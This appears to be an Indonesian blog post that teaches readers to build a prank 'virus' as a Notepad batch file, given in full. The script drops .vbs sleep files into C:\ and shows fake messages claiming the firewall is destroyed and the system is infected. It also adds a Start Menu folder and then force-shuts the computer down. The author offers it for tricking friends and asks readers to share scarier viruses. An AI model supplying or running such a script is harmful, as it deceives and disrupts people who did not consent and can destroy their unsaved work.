Cara Membuat Virus Sederhana

Havidz kan memberitau bagaimana membuat virus dengan notepad, ya, cukup dengan notepad saja. Virus yang akan kita buat yang aman-aman saja, hehe..selain untuk iseng dan mengerjai teman-teman kita yang sukanya usil.
Efek dari virus ini hanya menshutdown PC, dan lucunya: sebelum PC tershutdown akan muncul pesan-pesan teks yang menandakan komputer kamu telah terinfeksi virus ganas bin very ganas. Padahal ya hanya untuk menshutdown saja..haha
Ok, saatnya serius..Lets check it..

Silahkan copas alias copy paste kode dibawah ini di notepad kamu:

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM ZATYA BAJA ITEM
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +6284323xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN.”

Kemudian disimpan dengan nama terserah Kamu diakhiri .bat dan save type all file .
cth nya: haviedzganteng.bat
Havidz Disini hanya memberikan untuk berbagi dan sama-sama belajar. Dan terserah bagaimana Kamu menyikapinya dan menggunakannya.

Silahkan kasih komentar, saran dan kritik Kamu. Atau bahkan jika ada yang tau virus yang unik atau malah mengerikan silahkan di share di komentar di bawah ini! Thanks perhatiannya sobat ,,,,^_^

0 komentar:

Poskan Komentar

Ramalan Buat Anda

ramalan